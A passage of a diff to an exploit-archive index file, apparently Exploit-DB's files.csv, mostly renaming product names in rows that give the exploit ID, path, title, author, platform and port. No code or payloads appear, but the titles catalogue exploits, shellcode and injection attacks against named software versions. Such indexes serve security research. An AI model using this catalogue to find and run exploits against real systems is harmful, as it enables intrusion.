ABC Test Plugin - 'id' Parameter Cross-Site Scripting",2012-09-26,"Scott Herbert",php,webapps,0 +37896,platforms/php/webapps/37896.txt,"WordPress ABC Test Plugin - 'id' Parameter Cross-Site Scripting",2012-09-26,"Scott Herbert",php,webapps,0 37897,platforms/linux/dos/37897.html,"Midori Browser 0.3.2 - Denial of Service",2012-09-27,"Ryuzaki Lawlet",linux,dos,0 37898,platforms/linux/local/37898.py,"Reaver Pro - Privilege Escalation",2012-09-30,infodox,linux,local,0 37899,platforms/php/webapps/37899.txt,"Switchvox - Multiple HTML Injection Vulnerabilities",2012-10-02,"Ibrahim El-Sayed",php,webapps,0 37900,platforms/multiple/remote/37900.txt,"IBM Lotus Notes Traveler 8.5.1.x - Multiple Input Validation Vulnerabilities",2012-09-28,MustLive,multiple,remote,0 37901,platforms/php/webapps/37901.txt,"AlamFifa CMS - 'user_name_cookie' Parameter SQL Injection",2012-09-30,L0n3ly-H34rT,php,webapps,0 -37902,platforms/php/webapps/37902.php,"Wordpress Akismet Plugin - Multiple Cross-Site Scripting Vulnerabilities",2012-10-01,"Tapco Security",php,webapps,0 +37902,platforms/php/webapps/37902.php,"WordPress Akismet Plugin - Multiple Cross-Site Scripting Vulnerabilities",2012-10-01,"Tapco Security",php,webapps,0 37903,platforms/php/webapps/37903.txt,"ZenPhoto - 'admin-news-articles.php' Cross-Site Scripting",2012-10-02,"Scott Herbert",php,webapps,0 37904,platforms/php/webapps/37904.txt,"Omnistar Mailer - Multiple SQL Injections / HTML Injection Vulnerabilities",2012-10-01,"Vulnerability Laboratory",php,webapps,0 37905,platforms/windows/dos/37905.rb,"PowerTCP WebServer for - ActiveX Denial of Service",2012-09-28,catatonicprime,windows,dos,0 -37906,platforms/php/webapps/37906.txt,"Wordpress Googmonify Plugin 0.8.1 - Cross-Site Scripting / Cross-Site Request Forgery",2015-08-21,"Ehsan Hosseini",php,webapps,80 -37907,platforms/php/webapps/37907.txt,"Wordpress MDC Private Message Plugin 1.0.0 - Persistent Cross-Site Scripting",2015-08-21,"Chris Kellum",php,webapps,80 +37906,platforms/php/webapps/37906.txt,"WordPress Googmonify Plugin 0.8.1 - Cross-Site Scripting / Cross-Site Request Forgery",2015-08-21,"Ehsan Hosseini",php,webapps,80 +37907,platforms/php/webapps/37907.txt,"WordPress MDC Private Message Plugin 1.0.0 - Persistent Cross-Site Scripting",2015-08-21,"Chris Kellum",php,webapps,80 37908,platforms/windows/dos/37908.py,"Konica Minolta FTP Utility 1.0 - Remote Denial of Service (PoC)",2015-08-21,"Shankar Damodaran",windows,dos,21 37909,platforms/windows/dos/37909.txt,"Microsoft Office 2007 - wwlib.dll fcPlcfFldMom Uninitialized Heap Usage",2015-08-21,"Google Security Research",windows,dos,0 37910,platforms/windows/dos/37910.txt,"Microsoft Office 2007 - wwlib.dll Type Confusion (MS15-081)",2015-08-21,"Google Security Research",windows,dos,0 37911,platforms/windows/dos/37911.txt,"Microsoft Office 2007 - OGL.dll DpOutputSpanStretch::OutputSpan Out of Bounds Write (MS15-080)",2015-08-21,"Google Security Research",windows,dos,0 37912,platforms/windows/dos/37912.txt,"Microsoft Office 2007 - mso.dll Arbitrary Free (MS15-081)",2015-08-21,"Google Security Research",windows,dos,0 37913,platforms/windows/dos/37913.txt,"Microsoft Office 2007 - mso.dll Use-After-Free (MS15-081)",2015-08-21,"Google Security Research",windows,dos,0 -37914,platforms/windows/dos/37914.txt,"Windows - win32k.sys TTF Font Processing win32k!fsc_BLTHoriz Out-of-Bounds Pool Write",2015-08-21,"Google Security Research",windows,dos,0 -37915,platforms/windows/dos/37915.txt,"Windows - win32k.sys TTF Font Processing win32k!fsc_RemoveDups Out-of-Bounds Pool Memory Access",2015-08-21,"Google Security Research",windows,dos,0 -37916,platforms/windows/dos/37916.txt,"Windows ATMFD.DLL Out-of-Bounds Read Due to - Malformed FDSelect Offset in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0 -37917,platforms/windows/dos/37917.txt,"Windows ATMFD.DLL Out-of-Bounds Read Due to - Malformed Name INDEX in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0 -37918,platforms/windows/dos/37918.txt,"Windows - win32k.sys TTF Font Processing win32k!scl_ApplyTranslation Pool-Based Buffer Overflow",2015-08-21,"Google Security Research",windows,dos,0 -37919,platforms/windows/dos/37919.txt,"Windows - win32k.sys TTF Font Processing IUP[] Program Instruction Pool-Based Buffer Overflow",2015-08-21,"Google Security Research",windows,dos,0 -37920,platforms/windows/dos/37920.txt,"Windows ATMFD.DLL Write to Uninitialized Address Due to - Malformed CFF Table",2015-08-21,"Google Security Research",windows,dos,0 -37921,platforms/windows/dos/37921.txt,"Windows - ATMFD.dll CFF table (ATMFD+0x3440b / ATMFD+0x3440e) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0 -37922,platforms/windows/dos/37922.txt,"Windows ATMFD.DLL CFF table (ATMFD+0x34072 - / ATMFD+0x3407b) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0 -37923,platforms/windows/dos/37923.txt,"Windows - ATMFD.dll CharString Stream Out-of-Bounds Reads",2015-08-21,"Google Security Research",windows,dos,0 +37914,platforms/windows/dos/37914.txt,"Microsoft Windows - 'win32k.sys' TTF Font Processing win32k!fsc_BLTHoriz Out-of-Bounds Pool Write",2015-08-21,"Google Security Research",windows,dos,0 +37915,platforms/windows/dos/37915.txt,"Microsoft Windows - 'win32k.sys' TTF Font Processing win32k!fsc_RemoveDups Out-of-Bounds Pool Memory Access",2015-08-21,"Google Security Research",windows,dos,0 +37916,platforms/windows/dos/37916.txt,"Microsoft Windows - ATMFD.DLL Out-of-Bounds Read Due to - Malformed FDSelect Offset in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0 +37917,platforms/windows/dos/37917.txt,"Microsoft Windows - ATMFD.DLL Out-of-Bounds Read Due to - Malformed Name INDEX in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0 +37918,platforms/windows/dos/37918.txt,"Microsoft Windows - 'win32k.sys' TTF Font Processing win32k!scl_ApplyTranslation Pool-Based Buffer Overflow",2015-08-21,"Google Security Research",windows,dos,0 +37919,platforms/windows/dos/37919.txt,"Microsoft Windows - 'win32k.sys' TTF Font Processing IUP[] Program Instruction Pool-Based Buffer Overflow",2015-08-21,"Google Security Research",windows,dos,0 +37920,platforms/windows/dos/37920.txt,"Microsoft Windows - ATMFD.DLL Write to Uninitialized Address Due to - Malformed CFF Table",2015-08-21,"Google Security Research",windows,dos,0 +37921,platforms/windows/dos/37921.txt,"Microsoft Windows - ATMFD.dll CFF table (ATMFD+0x3440b / ATMFD+0x3440e) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0 +37922,platforms/windows/dos/37922.txt,"Microsoft Windows - ATMFD.DLL CFF table (ATMFD+0x34072 - / ATMFD+0x3407b) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0 +37923,platforms/windows/dos/37923.txt,"Microsoft Windows - ATMFD.dll CharString Stream Out-of-Bounds Reads",2015-08-21,"Google Security Research",windows,dos,0 37924,platforms/windows/dos/37924.txt,"Microsoft Office 2007 - MSPTLS Heap Index Integer Underflow (MS15-081)",2015-08-21,"Google Security Research",windows,dos,0 37925,platforms/windows/local/37925.txt,"Mozilla - Maintenance Service Log File Overwrite Elevation of Privilege",2015-08-21,"Google Security Research",windows,local,0 37926,platforms/php/webapps/37926.txt,"Netsweeper 2.6.29.8 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0 @@ -34266,15 +34269,15 @@ id,file,description,date,author,platform,type,port 37931,platforms/php/webapps/37931.txt,"Netsweeper 3.0.6 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0 37932,platforms/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload and Execution",2015-08-21,"Anastasios Monachos",php,webapps,0 37933,platforms/php/webapps/37933.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0 -37934,platforms/php/webapps/37934.txt,"Wordpress Shopp Plugin - Multiple Security Vulnerabilities",2012-10-05,T0x!c,php,webapps,0 +37934,platforms/php/webapps/37934.txt,"WordPress Shopp Plugin - Multiple Security Vulnerabilities",2012-10-05,T0x!c,php,webapps,0 37935,platforms/php/webapps/37935.txt,"Interspire Email Marketer - (Cross-Site Scripting / HTML Injection / SQL Injection) Multiple Vulnerabilities",2012-10-08,"Ibrahim El-Sayed",php,webapps,0 37936,platforms/php/webapps/37936.txt,"Open Realty - 'select_users_lang' Parameter Local File Inclusion",2012-10-06,L0n3ly-H34rT,php,webapps,0 37952,platforms/windows/remote/37952.py,"Easy Address Book Web Server 1.6 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0 37954,platforms/windows/dos/37954.py,"Mock SMTP Server 1.0 - Remote Crash (PoC)",2015-08-24,"Shankar Damodaran",windows,dos,25 37955,platforms/php/webapps/37955.html,"Pligg CMS 2.0.2 - Cross-Site Request Forgery (Add Admin) Exploit",2015-08-24,"Arash Khazaei",php,webapps,80 -37956,platforms/php/webapps/37956.txt,"Wordpress GeoPlaces3 Theme - Arbitrary File Upload",2015-08-24,Mdn_Newbie,php,webapps,80 -37957,platforms/windows/dos/37957.txt,"GOM Audio 2.0.8 - (.gas) Crash (PoC)",2015-08-24,Un_N0n,windows,dos,0 -37958,platforms/multiple/remote/37958.rb,"Firefox - pdf.js Privileged Javascript Injection",2015-08-24,Metasploit,multiple,remote,0 +37956,platforms/php/webapps/37956.txt,"WordPress GeoPlaces3 Theme - Arbitrary File Upload",2015-08-24,Mdn_Newbie,php,webapps,80 +37957,platforms/windows/dos/37957.txt,"GOM Audio 2.0.8 - '.gas' Crash (PoC)",2015-08-24,Un_N0n,windows,dos,0 +37958,platforms/multiple/remote/37958.rb,"Firefox - pdf.js Privileged JavaScript Injection",2015-08-24,Metasploit,multiple,remote,0 37959,platforms/php/webapps/37959.txt,"BSW Gallery - 'uploadpic.php' Arbitrary File Upload",2012-10-18,"cr4wl3r ",php,webapps,0 37960,platforms/php/webapps/37960.txt,"Amateur Photographer's Image Gallery - force-download.php file Parameter Information Disclosure",2012-10-18,"cr4wl3r ",php,webapps,0 37961,platforms/php/webapps/37961.txt,"Amateur Photographer's Image Gallery - plist.php albumid Parameter SQL Injection",2012-10-18,"cr4wl3r ",php,webapps,0 @@ -34285,8 +34288,8 @@ id,file,description,date,author,platform,type,port 37966,platforms/windows/dos/37966.txt,"Microsoft Office 2007 - OneTableDocumentStream Invalid Object",2015-08-25,"Google Security Research",windows,dos,0 37967,platforms/windows/dos/37967.txt,"Microsoft Office 2007 - Malformed Document Stack Based Buffer Overflow",2015-08-25,"Google Security Research",windows,dos,0 37968,platforms/php/webapps/37968.txt,"CMS Mini 0.2.2 - 'index.php' Script Cross-Site Scripting",2012-10-19,Netsparker,php,webapps,0 -37969,platforms/hardware/remote/37969.txt,"FirePass 7.0 SSL VPN - 'refreshURL' Parameter URI Redirection",2012-10-21,"Aung Khant",hardware,remote,0 -37970,platforms/php/webapps/37970.html,"Wordpress Wordfence Security Plugin - Cross-Site Scripting",2012-10-18,MustLive,php,webapps,0 +37969,platforms/hardware/remote/37969.txt,"FirePass 7.0 SSL VPN - 'refreshURL' Parameter URI redirection",2012-10-21,"Aung Khant",hardware,remote,0 +37970,platforms/php/webapps/37970.html,"WordPress Wordfence Security Plugin - Cross-Site Scripting",2012-10-18,MustLive,php,webapps,0 37971,platforms/php/webapps/37971.html,"WHMCS 4.5.2 - 'googlecheckout.php' SQL Injection",2012-10-22,"Starware Security Team",php,webapps,0 37973,platforms/php/webapps/37973.txt,"SMF - 'view' Parameter Cross-Site Scripting",2012-10-23,Am!r,php,webapps,0 37974,platforms/php/webapps/37974.txt,"Inventory - Multiple Cross-Site Scripting / SQL Injection",2012-10-26,G13,php,webapps,0 @@ -34304,41 +34307,41 @@ id,file,description,date,author,platform,type,port 37986,platforms/windows/dos/37986.txt,"Xion Audio Player 1.5 build 155 - Stack Based Buffer Overflow",2015-08-27,Un_N0n,windows,dos,0 37987,platforms/linux/local/37987.py,"FENIX 0.92 - Buffer Overflow",2015-08-27,"Juan Sacco",linux,local,0 37988,platforms/linux/local/37988.py,"BSIGN 0.4.5 - Buffer Overflow",2015-08-27,"Juan Sacco",linux,local,0 -37989,platforms/php/webapps/37989.txt,"IP.Board 4.X - Persistent Cross-Site Scripting",2015-08-27,snop,php,webapps,0 +37989,platforms/php/webapps/37989.txt,"IP.Board 4.x - Persistent Cross-Site Scripting",2015-08-27,snop,php,webapps,0 37990,platforms/multiple/dos/37990.txt,"QEMU - Programmable Interrupt Timer Controller Heap Overflow",2015-08-27,"Google Security Research",multiple,dos,0 37991,platforms/php/webapps/37991.txt,"WANem - Multiple Cross-Site Scripting Vulnerabilities",2012-10-16,"Brendan Coles",php,webapps,0 37992,platforms/php/webapps/37992.txt,"CorePlayer - 'callback' Parameter Cross-Site Scripting",2012-10-28,MustLive,php,webapps,0 37993,platforms/php/webapps/37993.txt,"Joomla! 'com_quiz' Component - SQL Injection",2012-10-30,"Daniel Barragan",php,webapps,0 37994,platforms/php/webapps/37994.txt,"NetCat CMS - Multiple Cross-Site Scripting Vulnerabilities",2012-10-31,"Security Effect Team",php,webapps,0 37995,platforms/asp/webapps/37995.txt,"SolarWinds Orion IP Address Manager - (IPAM) 'search.aspx' Cross-Site Scripting",2012-10-31,"Anthony Trummer",asp,webapps,0 -37996,platforms/windows/remote/37996.txt,"Axigen Mail Server - 'fileName' Parameter Directory Traversal",2012-10-31,"Zhao Liang",windows,remote,0 +37996,platforms/windows/remote/37996.txt,"Axigen Mail Server - 'Filename' Parameter Directory Traversal",2012-10-31,"Zhao Liang",windows,remote,0 37997,platforms/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service",2015-08-28,Vulnerability-Lab,ios,dos,3030 -37998,platforms/php/webapps/37998.txt,"Wordpress Responsive Thumbnail Slider Plugin 1.0 - Arbitrary File Upload",2015-08-28,"Arash Khazaei",php,webapps,80 +37998,platforms/php/webapps/37998.txt,"WordPress Responsive Thumbnail Slider Plugin 1.0 - Arbitrary File Upload",2015-08-28,"Arash Khazaei",php,webapps,80 37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross-Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0 38000,platforms/php/webapps/38000.txt,"Wolf CMS - Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80 38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80 38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - GET Command Buffer Overflow",2015-08-29,Koby,windows,remote,21 38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80 38005,platforms/windows/remote/38005.asp,"MS SQL Server 2000/2005 - SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer Exploit",2015-08-29,ylbhz,windows,remote,0 -38006,platforms/php/webapps/38006.txt,"bloofoxCMS 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-10-31,"Canberk BOLAT",php,webapps,0 +38006,platforms/php/webapps/38006.txt,"BloofoxCMS 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-10-31,"Canberk BOLAT",php,webapps,0 38007,platforms/php/webapps/38007.txt,"DCForum - auth_user_file.txt File Multiple Information Disclosure Vulnerabilities",2012-11-02,r45c4l,php,webapps,0 38008,platforms/php/webapps/38008.txt,"Joomla! com_parcoauto Component - 'idVeicolo' Parameter SQL Injection",2012-11-03,"Andrea Bocchetti",php,webapps,0 38009,platforms/php/webapps/38009.txt,"AWAuctionScript CMS - Multiple Remote Vulnerabilities",2012-11-04,X-Cisadane,php,webapps,0 38010,platforms/php/webapps/38010.txt,"VeriCentre - Multiple SQL Injections",2012-11-06,"Cory Eubanks",php,webapps,0 38011,platforms/php/webapps/38011.txt,"OrangeHRM - 'sortField' Parameter SQL Injection",2012-11-07,"High-Tech Bridge",php,webapps,0 -38012,platforms/php/webapps/38012.txt,"Wordpress FLV Player Plugin - 'id' Parameter SQL Injection",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0 +38012,platforms/php/webapps/38012.txt,"WordPress FLV Player Plugin - 'id' Parameter SQL Injection",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0 38013,platforms/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow",2015-08-29,Koby,windows,remote,21 38014,platforms/windows/dos/38014.py,"Sysax Multi Server 6.40 - SSH Component Denial of Service",2015-08-29,3unnym00n,windows,dos,22 38015,platforms/php/webapps/38015.txt,"AR Web Content Manager - (AWCM) cookie_gen.php Arbitrary Cookie Generation",2012-11-08,"Sooel Son",php,webapps,0 38016,platforms/multiple/webapps/38016.txt,"ESRI ArcGIS for Server - 'where' Form Field SQL Injection",2012-11-09,anonymous,multiple,webapps,0 -38017,platforms/php/webapps/38017.txt,"Wordpress Kakao Theme - 'ID' Parameter SQL Injection",2012-11-09,sil3nt,php,webapps,0 -38018,platforms/php/webapps/38018.txt,"Wordpress PHP Event Calendar Plugin - 'cid' Parameter SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 -38019,platforms/php/webapps/38019.txt,"Wordpress Eco-annu Plugin - 'eid' Parameter SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 +38017,platforms/php/webapps/38017.txt,"WordPress Kakao Theme - 'ID' Parameter SQL Injection",2012-11-09,sil3nt,php,webapps,0 +38018,platforms/php/webapps/38018.txt,"WordPress PHP Event Calendar Plugin - 'cid' Parameter SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 +38019,platforms/php/webapps/38019.txt,"WordPress Eco-annu Plugin - 'eid' Parameter SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 38020,platforms/hardware/remote/38020.py,"Multiple Huawei Products - Password Encryption",2012-11-13,"Roberto Paleari",hardware,remote,0 38021,platforms/multiple/dos/38021.pl,"Media Player Classic 1.5 - (MPC) WebServer Request Handling Remote Denial of Service",2012-11-16,X-Cisadane,multiple,dos,0 -38022,platforms/php/webapps/38022.txt,"Wordpress Dailyedition-mouss Theme - 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 -38023,platforms/php/webapps/38023.txt,"Wordpress Tagged Albums Plugin - 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 -38024,platforms/php/webapps/38024.txt,"WebKit Cross-Site Scripting Filter - ' Cross-Site ScriptingAuditor.cpp' Security Bypass",2012-07-19,"Tushar Dalvi",php,webapps,0 +38022,platforms/php/webapps/38022.txt,"WordPress Dailyedition-mouss Theme - 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 +38023,platforms/php/webapps/38023.txt,"WordPress Tagged Albums Plugin - 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 +38024,platforms/php/webapps/38024.txt,"WebKit Cross-Site Scripting Filter - 'Cross-Site ScriptingAuditor.cpp' Security Bypass",2012-07-19,"Tushar Dalvi",php,webapps,0 38025,platforms/php/webapps/38025.txt,"Omni-Secure - 'dir' Parameter Multiple File Disclosure Vulnerabilities",2012-11-19,HaCkeR_EgY,php,webapps,0 38026,platforms/php/webapps/38026.txt,"Friends in War The FAQ Manager - 'question' Parameter SQL Injection",2012-11-16,unsuprise,php,webapps,0 38027,platforms/php/webapps/38027.txt,"PhpWiki 1.5.4 - Multiple Vulnerabilities",2015-08-31,smash,php,webapps,80 @@ -34349,45 +34352,45 @@ id,file,description,date,author,platform,type,port 38032,platforms/ios/dos/38032.pl,"Viber 4.2.0 - Non-Printable Characters Handling Denial of Service",2015-08-31,"Mohammad Reza Espargham",ios,dos,0 38034,platforms/hardware/webapps/38034.txt,"Cyberoam Firewall CR500iNG-XP - 10.6.2 MR-1 - Blind SQL Injection",2015-08-31,"Dharmendra Kumar Singh",hardware,webapps,0 38035,platforms/windows/local/38035.pl,"Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow",2015-08-31,"Robbie Corley",windows,local,0 -38036,platforms/osx/local/38036.rb,"Apple OSX Entitlements - 'Rootpipe' Privilege Escalation",2015-08-31,Metasploit,osx,local,0 +38036,platforms/osx/local/38036.rb,"Apple Mac OS X Entitlements - 'Rootpipe' Privilege Escalation",2015-08-31,Metasploit,osx,local,0 38037,platforms/php/webapps/38037.html,"Open-Realty 2.5.8 - Cross-Site Request Forgery",2012-11-16,"Aung Khant",php,webapps,0 38038,platforms/multiple/dos/38038.txt,"Splunk 4.3.1 - Denial of Service",2012-11-19,"Alexander Klink",multiple,dos,0 38039,platforms/php/webapps/38039.txt,"openSIS - 'modname' Parameter Local File Inclusion",2012-11-20,"Julian Horoszkiewicz",php,webapps,0 38040,platforms/php/webapps/38040.txt,"ATutor - 'tool_file' Parameter Local File Inclusion",2012-11-16,"Julian Horoszkiewicz",php,webapps,0 -38041,platforms/php/webapps/38041.txt,"Wordpress Madebymilk Theme - 'id' Parameter SQL Injection",2012-11-20,"Ashiyane Digital Security Team",php,webapps,0 +38041,platforms/php/webapps/38041.txt,"WordPress Madebymilk Theme - 'id' Parameter SQL Injection",2012-11-20,"Ashiyane Digital Security Team",php,webapps,0 38042,platforms/php/webapps/38042.txt,"dotProject 2.1.x - 'index.php' Multiple Parameter SQL Injection",2012-11-21,"High-Tech Bridge",php,webapps,0 38043,platforms/php/webapps/38043.txt,"dotProject 2.1.x - 'index.php' Multiple Parameter Cross-Site Scripting",2012-11-21,"High-Tech Bridge",php,webapps,0 38044,platforms/php/webapps/38044.txt,"Feng Office - Security Bypass / HTML Injection Vulnerabilities",2012-11-21,Ur0b0r0x,php,webapps,0 38045,platforms/php/webapps/38045.html,"XiVO - Cross-Site Request Forgery",2012-11-21,"Francis Provencher",php,webapps,0 -38046,platforms/php/webapps/38046.txt,"Wordpress Zingiri Web Shop Plugin - 'path' Parameter Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",php,webapps,0 -38047,platforms/php/webapps/38047.txt,"Wordpress Webplayer Plugin - 'id' Parameter SQL Injection",2012-11-22,"Novin hack",php,webapps,0 -38048,platforms/php/webapps/38048.txt,"Wordpress Plg Novana Plugin - 'id' Parameter SQL Injection",2012-11-22,sil3nt,php,webapps,0 +38046,platforms/php/webapps/38046.txt,"WordPress Zingiri Web Shop Plugin - 'path' Parameter Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",php,webapps,0 +38047,platforms/php/webapps/38047.txt,"WordPress Webplayer Plugin - 'id' Parameter SQL Injection",2012-11-22,"Novin hack",php,webapps,0 +38048,platforms/php/webapps/38048.txt,"WordPress Plg Novana Plugin - 'id' Parameter SQL Injection",2012-11-22,sil3nt,php,webapps,0 38049,platforms/multiple/remote/38049.txt,"Greenstone - Multiple Security Vulnerabilities",2012-11-23,AkaStep,multiple,remote,0 -38050,platforms/php/webapps/38050.txt,"Wordpress Zarzadzonie Kontem Plugin - 'ajaxfilemanager.php' Script Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",php,webapps,0 +38050,platforms/php/webapps/38050.txt,"WordPress Zarzadzonie Kontem Plugin - 'ajaxfilemanager.php' Script Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",php,webapps,0 38051,platforms/php/webapps/38051.txt,"Bedita 3.5.1 - Cross-Site Scripting",2015-09-01,"Sébastien Morin",php,webapps,80 38052,platforms/windows/dos/38052.py,"Ricoh DC (SR10) 1.1.0.8 - Denial of Service",2015-09-01,j2x6,windows,dos,21 -38053,platforms/windows/dos/38053.txt,"Mpxplay Multimedia Commander 2.00a - .m3u Stack Based Buffer Overflow",2015-09-01,Un_N0n,windows,dos,0 +38053,platforms/windows/dos/38053.txt,"Mpxplay MultiMedia Commander 2.00a - '.m3u' Stack Based Buffer Overflow",2015-09-01,Un_N0n,windows,dos,0 38054,platforms/windows/dos/38054.txt,"SiS Windows VGA Display Manager 6.14.10.3930 - Write-What-Where (PoC)",2015-09-01,KoreLogic,windows,dos,0 38055,platforms/windows/dos/38055.txt,"XGI Windows VGA Display Manager 6.14.10.1090 - Arbitrary Write (PoC)",2015-09-01,KoreLogic,windows,dos,0 38056,platforms/hardware/webapps/38056.txt,"Edimax BR6228nS/BR6228nC - Multiple Vulnerabilities",2015-09-01,smash,hardware,webapps,80 -38057,platforms/php/webapps/38057.txt,"Wordpress Magazine Basic Theme - 'id' Parameter SQL Injection",2012-11-22,"Novin hack",php,webapps,0 +38057,platforms/php/webapps/38057.txt,"WordPress Magazine Basic Theme - 'id' Parameter SQL Injection",2012-11-22,"Novin hack",php,webapps,0 38058,platforms/ios/remote/38058.py,"Twitter for iPhone - Man in the Middle Security",2012-11-23,"Carlos Reventlov",ios,remote,0 38059,platforms/bsd/dos/38059.c,"OpenBSD 4.x - Portmap Remote Denial of Service",2012-11-22,auto236751,bsd,dos,0 -38060,platforms/php/webapps/38060.txt,"Wordpress Ads Box Plugin - 'count' Parameter SQL Injection",2012-11-26,"Ashiyane Digital Security Team",php,webapps,0 +38060,platforms/php/webapps/38060.txt,"WordPress Ads Box Plugin - 'count' Parameter SQL Injection",2012-11-26,"Ashiyane Digital Security Team",php,webapps,0 38061,platforms/php/webapps/38061.txt,"Beat Websites - 'id' Parameter SQL Injection",2012-11-24,Metropolis,php,webapps,0 -38062,platforms/multiple/webapps/38062.txt,"Forescout CounterACT - 'a' Parameter Open Redirection",2012-11-26,"Joseph Sheridan",multiple,webapps,0 -38063,platforms/php/webapps/38063.txt,"Wordpress Wp-ImageZoom Theme - 'id' Parameter SQL Injection",2012-11-26,Amirh03in,php,webapps,0 -38064,platforms/php/webapps/38064.txt,"Wordpress CStar Design Theme - 'id' Parameter SQL Injection",2012-11-27,Amirh03in,php,webapps,0 +38062,platforms/multiple/webapps/38062.txt,"Forescout CounterACT - 'a' Parameter Open redirection",2012-11-26,"Joseph Sheridan",multiple,webapps,0 +38063,platforms/php/webapps/38063.txt,"WordPress Wp-ImageZoom Theme - 'id' Parameter SQL Injection",2012-11-26,Amirh03in,php,webapps,0 +38064,platforms/php/webapps/38064.txt,"WordPress CStar Design Theme - 'id' Parameter SQL Injection",2012-11-27,Amirh03in,php,webapps,0 38065,platforms/osx/shellcode/38065.txt,"OS-X/x86-64 - /bin/sh Null Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode,0 38068,platforms/php/webapps/38068.txt,"MantisBT 1.2.19 - Host Header Attack",2015-09-02,"Pier-Luc Maltais",php,webapps,80 -38071,platforms/php/webapps/38071.rb,"YesWiki 0.2 - 'squelette' Path Traversal",2015-09-02,HaHwul,php,webapps,80 +38071,platforms/php/webapps/38071.rb,"YesWiki 0.2 - 'squelette' Directory Traversal",2015-09-02,HaHwul,php,webapps,80 38072,platforms/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash (PoC)",2015-09-02,"Meisam Monsef",windows,dos,21 38073,platforms/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - Cross-Site Request Forgery Command Execution",2015-09-02,"Phan Thanh Duy",hardware,webapps,80 38074,platforms/php/webapps/38074.txt,"Cerb 7.0.3 - Cross-Site Request Forgery",2015-09-02,"High-Tech Bridge SA",php,webapps,80 38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z - Bind Shell Port 12345 Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",system_z,shellcode,0 -38086,platforms/php/webapps/38086.html,"Wordpress Contact Form Generator 2.0.1 Plugin - Multiple Cross-Site Request Forgery Vulnerabilities",2015-09-06,"i0akiN SEC-LABORATORY",php,webapps,80 +38086,platforms/php/webapps/38086.html,"WordPress Contact Form Generator 2.0.1 Plugin - Multiple Cross-Site Request Forgery Vulnerabilities",2015-09-06,"i0akiN SEC-LABORATORY",php,webapps,80 38076,platforms/php/webapps/38076.txt,"BigDump 0.29b and 0.32b - Multiple Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0 -38077,platforms/php/webapps/38077.txt,"Wordpress Toolbox Theme - 'mls' Parameter SQL Injection",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0 +38077,platforms/php/webapps/38077.txt,"WordPress Toolbox Theme - 'mls' Parameter SQL Injection",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0 38078,platforms/php/webapps/38078.py,"Elastix - 'page' Parameter Cross-Site Scripting",2012-11-29,cheki,php,webapps,0 38099,platforms/php/webapps/38099.txt,"TinyMCPUK - 'test' Parameter Cross-Site Scripting",2012-12-01,eidelweiss,php,webapps,0 38080,platforms/hardware/webapps/38080.txt,"Zhone ADSL2+ 4P Bridge & Router (Broadcom) - Multiple Vulnerabilities",2015-09-04,Vulnerability-Lab,hardware,webapps,0 @@ -34399,21 +34402,21 @@ id,file,description,date,author,platform,type,port 38090,platforms/php/webapps/38090.txt,"FireEye Appliance - Unauthorized File Disclosure",2015-09-06,"Kristian Erik Hermansen",php,webapps,443 38091,platforms/php/webapps/38091.php,"Elastix < 2.5 - PHP Code Injection",2015-09-06,i-Hmx,php,webapps,0 38100,platforms/hardware/remote/38100.txt,"Multiple Fortinet FortiWeb Appliances - Multiple Cross-Site Scripting Vulnerabilities",2012-12-01,"Benjamin Kunz Mejri",hardware,remote,0 -38101,platforms/php/webapps/38101.txt,"Wordpress Zingiri Forums Plugin - 'language' Parameter Local File Inclusion",2012-12-30,Amirh03in,php,webapps,0 -38102,platforms/php/webapps/38102.txt,"Wordpress Nest Theme - 'codigo' 